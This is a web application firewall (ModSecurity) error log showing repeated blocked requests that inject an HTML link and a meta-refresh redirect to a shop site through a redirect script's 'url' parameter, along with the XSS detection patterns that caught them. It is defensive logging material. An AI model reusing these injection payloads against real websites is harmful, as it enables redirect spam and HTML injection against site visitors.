[Tue May 12 01:47:19.631909 2026] [security2:error] [pid 1709071:tid 1709094] [client 27.78.84.116:65253] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqh7vMumyrWMfSu7qa5gAAAMc"]
[Tue May 12 01:47:19.632398 2026] [security2:error] [pid 1709071:tid 1709094] [client 27.78.84.116:65253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqh7vMumyrWMfSu7qa5gAAAMc"]
[Tue May 12 01:47:19.633496 2026] [security2:error] [pid 1709071:tid 1709094] [client 27.78.84.116:65253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqh7vMumyrWMfSu7qa5gAAAMc"]
[Tue May 12 01:47:20.423414 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:65328] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqiFfdQaraX_prmqcPjQAAABM"]
[Tue May 12 01:47:20.424968 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:65328] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqiFfdQaraX_prmqcPjQAAABM"]
[Tue May 12 01:47:20.425153 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:65328] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqiFfdQaraX_prmqcPjQAAABM"]
[Tue May 12 01:47:20.425454 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:65328] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqiFfdQaraX_prmqcPjQAAABM"]
[Tue May 12 01:47:20.425662 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:65328] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqiFfdQaraX_prmqcPjQAAABM"]
[Tue May 12 01:47:20.426143 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:65328] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqiFfdQaraX_prmqcPjQAAABM"]
[Tue May 12 01:47:20.426477 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:65328] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqiFfdQaraX_prmqcPjQAAABM"]
[Tue May 12 01:47:21.155025 2026] [security2:error] [pid 1707624:tid 1707685] [client 27.78.84.116:65405] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibOxS7i6i_mT2NK5hQAAAEM"]
[Tue May 12 01:47:21.166860 2026] [security2:error] [pid 1707624:tid 1707685] [client 27.78.84.116:65405] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibOxS7i6i_mT2NK5hQAAAEM"]
[Tue May 12 01:47:21.199849 2026] [security2:error] [pid 1707624:tid 1707685] [client 27.78.84.116:65405] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibOxS7i6i_mT2NK5hQAAAEM"]
[Tue May 12 01:47:21.201734 2026] [security2:error] [pid 1707624:tid 1707685] [client 27.78.84.116:65405] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibOxS7i6i_mT2NK5hQAAAEM"]
[Tue May 12 01:47:21.203338 2026] [security2:error] [pid 1707624:tid 1707685] [client 27.78.84.116:65405] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibOxS7i6i_mT2NK5hQAAAEM"]
[Tue May 12 01:47:21.203818 2026] [security2:error] [pid 1707624:tid 1707685] [client 27.78.84.116:65405] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibOxS7i6i_mT2NK5hQAAAEM"]
[Tue May 12 01:47:21.204869 2026] [security2:error] [pid 1707624:tid 1707685] [client 27.78.84.116:65405] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibOxS7i6i_mT2NK5hQAAAEM"]
[Tue May 12 01:47:22.001013 2026] [security2:error] [pid 1709071:tid 1709104] [client 27.78.84.116:65519] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibvMumyrWMfSu7qa5wAAANE"]
[Tue May 12 01:47:22.002806 2026] [security2:error] [pid 1709071:tid 1709104] [client 27.78.84.116:65519] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibvMumyrWMfSu7qa5wAAANE"]
[Tue May 12 01:47:22.003312 2026] [security2:error] [pid 1709071:tid 1709104] [client 27.78.84.116:65519] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibvMumyrWMfSu7qa5wAAANE"]
[Tue May 12 01:47:22.003921 2026] [security2:error] [pid 1709071:tid 1709104] [client 27.78.84.116:65519] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibvMumyrWMfSu7qa5wAAANE"]
[Tue May 12 01:47:22.004695 2026] [security2:error] [pid 1709071:tid 1709104] [client 27.78.84.116:65519] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ubl.icwordtiredplan.e.s.j.a.d.e.d.i.m.p.u@e.xped.it.io.n.eg.d.g@burton.rene@ehostingpoint.com/info.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibvMumyrWMfSu7qa5wAAANE"]
[Tue May 12 01:47:22.005273 2026] [security2:error] [pid 1709071:tid 1709104] [client 27.78.84.116:65519] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibvMumyrWMfSu7qa5wAAANE"]
[Tue May 12 01:47:22.005625 2026] [security2:error] [pid 1709071:tid 1709104] [client 27.78.84.116:65519] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJqibvMumyrWMfSu7qa5wAAANE"]
